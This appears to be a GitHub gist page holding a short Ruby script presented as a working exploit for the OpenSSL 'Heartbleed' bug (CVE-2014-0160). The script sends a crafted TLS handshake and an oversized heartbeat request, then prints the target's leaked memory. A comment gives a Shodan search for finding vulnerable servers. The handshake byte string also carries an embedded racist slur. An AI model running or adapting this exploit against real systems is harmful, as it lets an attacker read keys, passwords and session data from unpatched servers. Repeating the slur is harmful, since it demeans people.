Skip to content

Instantly share code, notes, and snippets.

@komodoooo
Last active February 16, 2024 10:11
Show Gist options
  • Save komodoooo/4f4b330ab727a5c63d834fcc7bdc433b to your computer and use it in GitHub Desktop.
Save komodoooo/4f4b330ab727a5c63d834fcc7bdc433b to your computer and use it in GitHub Desktop.
CVE-2014-0160 "Heartbleed" exploit
require 'socket'
puts """
CVE-2014-0160
OpenSSL 'Heartbleed' buffer over-read exploit
By Komodo\n
"""
=begin
Shodan dork to search vulnerable targets:
"OpenSSL/1.0.1", "OpenSSL/1.0.1a" trough "OpenSSL/1.0.1f"
=end
def main(address)
hello = "\x16\x03\x02\x004\x01\x00\x000\x03\x02a]\x9a\xcbITLOOKSLIKEAGLOWING"+
"CIANIGGER\x00\x00\x02\x00/\x01\x00\x00\x05\xff\x01\x00\x01\x00"
payload = "\x18\x03\x02\x00\x03\x01\xff\xff"
print "Port (press enter for default 443): "
port = gets.chomp
s = TCPSocket.new(address,port.empty??443:port.to_i)
s.sendmsg(hello)
s.recv(8192)
s.sendmsg(payload)
return "\n#{address} Memory dump:\n\n#{s.recv(65536)}\n"
end
begin
print "Address/domain: "
puts(main(gets.chomp))
rescue => e
abort("\nError: #{e}\n\n")
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment